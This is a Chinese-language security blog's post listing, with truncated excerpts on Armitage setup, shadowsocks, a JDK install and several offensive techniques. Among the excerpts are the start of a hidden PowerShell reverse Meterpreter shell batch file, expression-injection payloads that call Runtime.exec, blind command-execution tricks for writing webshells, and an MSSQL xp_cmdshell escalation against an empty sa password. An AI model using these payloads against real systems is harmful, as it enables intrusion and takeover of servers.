导入Github上的Armitage项目到本地的Eclipse

RedFree | CobaltStrike, JAVA, Metasploit | 2016-06-13
导入Github上的Armitage项目到本地的Eclipse
一、首先要为Eclipse安装WindowBuilder插件WindowBuilder下载地址:http://www.eclipse.org/windowbuilder/安装可以参考:http://jingyan.baidu.com/article/358570f67d88b2ce4724fcf5.html二、新建一个项目三、建立Armitage项目从Github上打包或克隆Armitage的源码[https://github.com/rsmudge/armitage],将其中的lib、resources、scripts、scripts-c... [阅读全文]
ė146 次访问 6没有评论 0,

使用Powershell反弹Meterpreter Shell

RedFree | Metasploit | 2016-06-13
使用Powershell反弹Meterpreter Shell
有时遇到有命令执行的点,却看不到命令执行的结果,使用Powershell可以轻易反弹回一个Meterpreter Shell。我从Veil中提取了生成Powershell reverse_tcp Payload的代码:生成的Payload是一个bat文件:@echo off if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass&nbs... [阅读全文]
ė58 次访问 6没有评论 0,

在debian系统的vps上搭建shadowsocks-libev

RedFree | Linux | 2016-06-13
什么是shadowsocksshadowsocks 是一个轻量级隧道代理,用来穿过防火墙。目前服务端主流的是shadowsocks-nodejsshadowsocks-libevshadowsocks-Pythonshadowsocks-go但是在小内存的vps还是要尽量节省内存,所以推荐shadowsocks-libev。shadowsocks-libev有如下特点:其一:版本更新及时,新功能支持的较多。比如目前最新的1.4.1版就支持UDP、多端口... [阅读全文]
ė49 次访问 6没有评论 0

Windows隐式命令执行查找Web目录的技巧

RedFree | C#, Metasploit, Windows | 2016-06-13
Windows隐式命令执行查找Web目录的技巧
撸站时难免会遇到一些比较特殊的情况,遇到一个可以执行命令的点(Windows,可连外网),却无法获得回显;这种情况下我通常会用这几种方法去尝试: 1、使用CloudEye获取命令执行的结果 2、找Web路径写WebShell 3、下载一个MSF的Payload直接反弹 某些情况下目标直接对公网开放3389,直接加个账户用完再删... 先说第一种方法,使用... [阅读全文]
ė56 次访问 6没有评论 0,

表达式注入的几类Payload

RedFree | JAVA | 2016-06-12
验证:${6196753-3562104}若页面中包含2634649,再验证其它数字相减页面中是否包含计算的结果,若有则表明其存在表达式注入。不同类型的Payload:实际上在利用表达式注入这类漏洞的时候有这么几类Payload去执行命令:1、${\u0027\u007e\u007e\u0027+\u0027\u0032\u0027+@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\... [阅读全文]
ė340 次访问 6没有评论 0

Debian安装JDK7

RedFree | Linux | 2016-06-12
一、下载JDK :      点击链接在Oracle官网下载JDK7u55:JDKu55二、把jdk压缩文件放到/usr/local文件夹下mv 存放jdk压缩文件的文件夹绝对路径/jdk-7u55-linux-i586.tar.gz /usr/local三、解压jdk压缩文件到/usr/localcd /usr/local tar -zxvf jdk-7u55-linux-i586.tar.gz四、修改解压后文件夹的名字mv jdk1.7.0_55&n... [阅读全文]
ė37 次访问 6没有评论 0,

记一次艰难的MSSQL提权[转载]

RedFree | MSSQL | 2016-06-12
昨晚没关机 扫了一夜 扫到一个3389,而且开着1433,且1433的sa账户是空口令。遂大喜。第一步:尝试xp_cmdshellxp_cmdshell 'dir c:/ >> r.txt'提示找不到xplog70.dll,于是我恢复一下xp_cmdshell试试exec sp_dropextendedproc 'xp_cmdshell' dbcc addextendedproc ('xp_cmdshell&#... [阅读全文]
ė69 次访问 6没有评论 0, ,
Ɣ回顶部